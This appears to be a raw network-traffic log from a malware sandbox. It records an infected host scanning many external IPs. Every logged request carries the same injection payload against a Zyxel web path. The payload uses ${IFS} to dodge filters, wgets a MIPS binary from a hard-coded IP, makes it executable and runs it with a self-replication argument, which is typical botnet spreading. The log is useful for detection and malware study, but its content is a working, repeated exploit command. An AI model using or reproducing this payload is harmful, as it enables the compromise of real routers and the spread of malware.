                                          Jan 14, 2024 15:46:02.731043100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1061192.168.2.235811823.226.105.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731062889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1062192.168.2.234924285.100.80.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731096029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1063192.168.2.2357134208.150.152.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731143951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1064192.168.2.2338858117.216.142.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731216908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1065192.168.2.2359310180.39.91.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731214046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1066192.168.2.2356036165.24.181.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731216908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1067192.168.2.2355456158.210.103.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731220007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1068192.168.2.233960479.115.33.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731226921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1069192.168.2.2355124210.237.224.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731218100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1070192.168.2.2359140126.38.220.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731270075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1071192.168.2.2346584143.105.142.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731312037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1072192.168.2.2353644223.177.227.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731312037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1073192.168.2.2353616181.5.220.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731312990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1074192.168.2.234370620.196.119.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731334925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1075192.168.2.235785073.220.18.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731400013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1076192.168.2.2356836157.187.3.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731439114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1077192.168.2.23359825.199.227.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731477976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1078192.168.2.2347784105.88.221.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731479883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1079192.168.2.234562662.101.47.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731492996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1080192.168.2.2342172140.17.220.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731525898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1081192.168.2.234753868.39.183.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731574059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1082192.168.2.234329880.42.119.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731625080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1083192.168.2.235061639.254.42.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731635094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1084192.168.2.2345312207.205.178.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731641054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1085192.168.2.2355334206.34.198.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731684923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1086192.168.2.2339960116.99.183.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731693029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1087192.168.2.235758825.243.106.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731710911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1088192.168.2.235508492.245.188.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731765985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1089192.168.2.2349246178.146.195.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731771946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1090192.168.2.2356170141.89.152.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731784105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1091192.168.2.235914843.35.82.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731807947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1092192.168.2.2335692138.171.119.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731825113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1093192.168.2.2341440103.92.246.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731873989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1094192.168.2.2351884186.21.145.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731883049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1095192.168.2.234051852.76.126.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731930017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1096192.168.2.2334626166.212.79.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731940985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1097192.168.2.2346868137.133.85.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.731966019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1098192.168.2.2339638144.57.72.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732013941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1099192.168.2.2357242209.165.32.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732013941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1100192.168.2.235100093.191.122.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732058048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1101192.168.2.2346388205.224.195.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732060909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1102192.168.2.2335382134.134.70.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732105017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1103192.168.2.235090417.206.80.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732145071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1104192.168.2.2343700220.198.159.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732177973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1105192.168.2.2338994156.215.253.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732197046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1106192.168.2.2335546126.140.205.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732203960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1107192.168.2.235312634.233.90.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732254982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1108192.168.2.234920452.180.14.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732306004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1109192.168.2.2344362166.209.95.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732314110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1110192.168.2.2350814135.87.12.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732351065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1111192.168.2.2334032151.124.199.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732374907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1112192.168.2.235944612.208.90.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732394934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1113192.168.2.2351938191.188.181.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732448101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1114192.168.2.2334048157.42.69.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732471943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1115192.168.2.2333590139.112.7.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732515097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1116192.168.2.2348650139.239.26.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732530117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1117192.168.2.2349062142.32.245.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732530117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1118192.168.2.2340192208.43.102.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732536077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1119192.168.2.2354176208.68.20.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732577085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1120192.168.2.2350590117.84.37.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732661963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1121192.168.2.2344754187.98.190.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732661963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1122192.168.2.233498054.165.47.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.732662916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1123192.168.2.235633048.204.94.162443
                                          TimestampBytes transferredDirectionData
